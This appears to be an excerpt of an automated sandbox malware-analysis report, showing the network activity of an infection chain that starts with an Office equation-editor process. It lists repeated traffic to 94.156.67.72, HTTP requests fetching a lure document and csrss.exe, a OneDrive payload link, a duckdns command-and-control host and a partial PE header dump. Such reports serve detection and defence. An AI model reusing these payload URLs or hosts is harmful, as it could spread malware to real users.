                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo
                  Source: Malware configuration extractorURLs: wwsaer.duckdns.org
                  Source: unknownDNS query: name: wwsaer.duckdns.org
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8CF48 InternetCheckConnectionA,11_2_02C8CF48
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.92.251.26:8533
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 May 2024 18:21:05 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Thu, 23 May 2024 07:42:57 GMTETag: "153000-6191a33203e60"Accept-Ranges: bytesContent-Length: 1388544Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d4 05 00 00 58 0f 00 00 00 00 00 28 ec 05 00 00 10 00 00 00 f0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 15 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 13 00 40 25 00 00 00 00 14 00 00 bc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 13 00 d4 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 13 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 46 13 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 96 05 00 00 10 00 00 00 96 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 70 3c 00 00 00 b0 05 00 00 3e 00 00 00 9a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 07 0d 00 00 f0 05 00 00 08 0d 00 00 d8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 98 36 00 00 00 00 13 00 00 00 00 00 00 e0 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 40 25 00 00 00 40 13 00 00 26 00 00 00 e0 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 70 13 00 00 00 00 00 00 06 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 80 13 00 00 02 00 00 00 06 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 6b 00 00 00 90 13 00 00 6c 00 00 00 08 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 bc 01 00 00 00 14 00 00 bc 01 00 00 74 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 15 00 00 00 00 00 00 30 15 00 00 00
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 150.171.41.11 150.171.41.11
                  Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: TERASYST-ASBG TERASYST-ASBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: global trafficHTTP traffic detected: GET /download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: global trafficHTTP traffic detected: GET /NAvSGzZ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qr-in.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.156.67.72Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /4020/csrss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.156.67.72Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.67.72
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,8_2_33D5B380
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE2FF046.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: global trafficHTTP traffic detected: GET /NAvSGzZ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qr-in.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.156.67.72Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /4020/csrss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.156.67.72Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: qr-in.com
                  Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
                  Source: global trafficDNS traffic detected: DNS query: f3rtrw.bl.files.1drv.com
                  Source: global trafficDNS traffic detected: DNS query: wwsaer.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: EQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.67.72/4020/csrss.exe
                  Source: EQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.67.72/4020/csrss.exej
                  Source: EQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.67.72/4020/csrss.exejjC:
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
